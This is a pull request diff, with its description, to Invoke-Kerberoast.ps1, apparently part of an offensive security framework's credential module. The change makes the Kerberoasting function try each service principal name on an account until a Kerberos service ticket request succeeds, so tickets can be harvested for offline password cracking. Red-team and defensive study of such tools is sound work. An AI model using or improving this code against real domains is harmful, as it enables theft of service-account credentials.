### PR TITLE
Fix failed ticket generation in Invoke-Kerberoast

### DIFF
--- a/data/module_source/credentials/Invoke-Kerberoast.ps1
+++ b/data/module_source/credentials/Invoke-Kerberoast.ps1
@@ -595,16 +595,18 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
                 $DistinguishedName = 'UNKNOWN'
             }
 
-            # if a user has multiple SPNs we only take the first one otherwise the service ticket request fails miserably :) -@st3r30byt3
-            if ($UserSPN -is [System.DirectoryServices.ResultPropertyValueCollection]) {
-                $UserSPN = $UserSPN[0]
-            }
-
-            try {
-                $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
-            }
-            catch {
-                Write-Warning "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName' : $_"
+            $Ticket = $null
+			# iterate SPNs until ticket could be requested successfully
+            foreach($spn in $UserSPN)
+            {
+                try {
+                    $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn
+					# exit loop on first successful ticket request
+                    break
+                }
+                catch {
+                    Write-Debug "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName' : $_"
+                }
             }
             if ($Ticket) {
                 $TicketByteStream = $Ticket.GetRequest()


### PR DESCRIPTION
If Kerberos ticket generation fails for the first SPN of a service account, a ticket is requested for the alternate SPNs until a ticket can be generated successfully.